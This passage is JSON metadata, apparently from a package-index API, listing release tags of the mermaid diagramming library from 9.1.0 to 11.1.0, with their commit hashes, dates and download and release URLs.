tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G